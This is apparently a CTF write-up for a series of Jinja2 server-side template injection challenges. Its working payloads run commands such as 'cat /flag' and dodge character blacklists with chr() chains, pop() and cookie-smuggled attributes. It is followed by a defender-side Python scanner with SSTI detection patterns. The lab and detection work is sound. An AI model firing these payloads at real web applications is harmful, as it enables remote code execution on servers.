361
No filtering found, just ran it through Burp.
Final payload: {{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
362
Same payload as 361.
363
A quick fuzz shows single and double quotes are filtered; bypass it by passing the parameters via GET, or use Burp to fuzz out the class that exposes chr, which also gets around it.
Payload: {{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[request.args.arg1](request.args.arg2).read()}}&arg1=open&arg2=/flag
364
Single and double quotes and args are filtered; bypassed with chr (I wanted a fuzz dictionary but couldn't find one on GitHub, so I fuzzed it by deleting the payload one character at a time...).
Use this payload to fuzz out chr:
{{().__class__.__base__.__subclasses__()[?].__init__.__globals__.__builtins__.chr}}
{% set chr = ().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__.chr %}{{().__class__.__base__.__subclasses__()[257].__init__.__globals__.popen(chr(119)%2bchr(104)%2bchr(111)%2bchr(97)%2bchr(109)%2bchr(105)).read()}}
Fuzz again with this payload; it fuzzed out index 132.
Final payload:
{%%20set%20chr%20=%20().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__.chr%20%}{{().__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}
365
Much like the previous challenge; fuzzing shows it additionally filters square brackets, which can be replaced with __getitem__ or pop to take the nth element of a list.
Find chr:
{{().__class__.__base__.__subclasses__().pop(433).__init__.__globals__.__builtins__.chr}}
Final payload:
{%%20set%20chr%20=%20().__class__.__base__.__subclasses__().pop(433).__init__.__globals__.__builtins__.chr%20%}{{().__class__.__base__.__subclasses__().pop(132).__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}
366
This one additionally filters _. Hex encoding could bypass that, but it seems to need quotes, and this challenge also doesn't seem to let you fuzz out the chr function, so I bypassed it by passing the parameters via request.
You can also look at the blog post 羽师傅 wrote earlier on SSTI bypasses.
Payload:
?name={{(wa1ki0g|attr(request.cookies.w1)|attr(request.cookies.w2)|attr(request.cookies.w3))(request.cookies.w4).eval(request.cookies.w5)}}
Cookie:w1=__init__;w2=__globals__;w3=__getitem__;w4=__builtins__;w5=__import__('os').popen('cat /flag').read()
367
Same payload as above.
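The whole series shows the same lesson from the defender's side: each challenge's character blacklist (quotes, then args, then brackets, then underscores) is walked around by substituting pop() for brackets, chr() chains for string literals, and attr() plus request values for underscores. The scanner below is an added example, not part of this writeup, and contrasts that kind of blacklist with structural indicators applied after URL decoding, scanning the query string and Cookie header together because the web366 payload splits its pieces across the two. The sample requests are constructed from the payloads above; the function and indicator names are this example's own. The real fix is of course never to compile user input into a template at all (or at least to render it through jinja2.sandbox.SandboxedEnvironment); the detector is for spotting attempts in logs.

```python
# Added example (not part of the original writeup): a defender-side scanner for the
# Jinja2 SSTI payload shapes used in the web361-367 challenges. It contrasts the
# challenges' character blacklist, which every later payload walks around, with
# structural indicators applied after URL decoding. Sample inputs are constructed
# from the writeup's own payloads.
import re
from urllib.parse import unquote_plus


def naive_blacklist_hits(raw, banned=("'", '"', "[", "]", "args", "_")):
    """The strictest per-character blacklist the series reaches.
    Returns the banned tokens found in the decoded input (empty = would pass)."""
    text = unquote_plus(raw)
    return [b for b in banned if b in text]


# Structural indicators. They survive the substitutions the writeup uses because
# they match the traversal shape (what the payload does), not particular bytes.
INDICATORS = {
    "template_delimiter": re.compile(r"\{\{|\{%"),
    "dunder_traversal": re.compile(
        r"__(class|bases?|subclasses|init|globals|builtins|getitem|import)__"),
    "attr_filter_with_request": re.compile(
        r"\|\s*attr\s*\(\s*request\.(args|cookies|form|values|headers)", re.I),
    "chr_chain": re.compile(r"chr\(\d+\)(\s*\+\s*chr\(\d+\))+"),   # %2b decodes to +
    "index_via_pop": re.compile(r"\.pop\(\d+\)"),
    "popen_or_eval": re.compile(r"\b(popen|eval|exec|__import__)\b"),
}


def detect_ssti(raw, threshold=2):
    """Decode one request field and report which indicators fire."""
    text = unquote_plus(raw)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"decoded": text, "hits": hits, "suspicious": len(hits) >= threshold}


def scan_request(query, cookie=""):
    """Scan the query string and the Cookie header together: the web366 payload
    keeps the dunder names and popen in the cookie, so either field alone
    looks less alarming than the pair."""
    fields = {"query": detect_ssti(query), "cookie": detect_ssti(cookie)}
    combined = sorted(set(fields["query"]["hits"]) | set(fields["cookie"]["hits"]))
    return {"fields": fields, "hits": combined, "suspicious": len(combined) >= 2}


# Constructed samples: one benign request plus payloads copied from the writeup.
BENIGN = "?name=alice"
WEB365 = (
    "{%%20set%20chr%20=%20().__class__.__base__.__subclasses__().pop(433)"
    ".__init__.__globals__.__builtins__.chr%20%}{{().__class__.__base__"
    ".__subclasses__().pop(132).__init__.__globals__.popen(chr(99)%2bchr(97)"
    "%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103))"
    ".read()}}"
)
WEB366_QUERY = (
    "?name={{(wa1ki0g|attr(request.cookies.w1)|attr(request.cookies.w2)"
    "|attr(request.cookies.w3))(request.cookies.w4).eval(request.cookies.w5)}}"
)
WEB366_COOKIE = (
    "w1=__init__;w2=__globals__;w3=__getitem__;w4=__builtins__;"
    "w5=__import__('os').popen('cat /flag').read()"
)

if __name__ == "__main__":
    samples = [("benign", BENIGN, ""), ("web365", WEB365, ""),
               ("web366", WEB366_QUERY, WEB366_COOKIE)]
    for label, query, cookie in samples:
        result = scan_request(query, cookie)
        print(f"{label:7} blacklist_on_query={naive_blacklist_hits(query)} "
              f"indicators={result['hits']} suspicious={result['suspicious']}")
```

Running it shows the web365 payload tripping the blacklist only on its underscores while five structural indicators fire, and the web366 query string passing the blacklist with nothing banned in it at all, yet still being flagged by the attr()-with-request-values and eval indicators, with the cookie contributing the dunder traversal and popen hits.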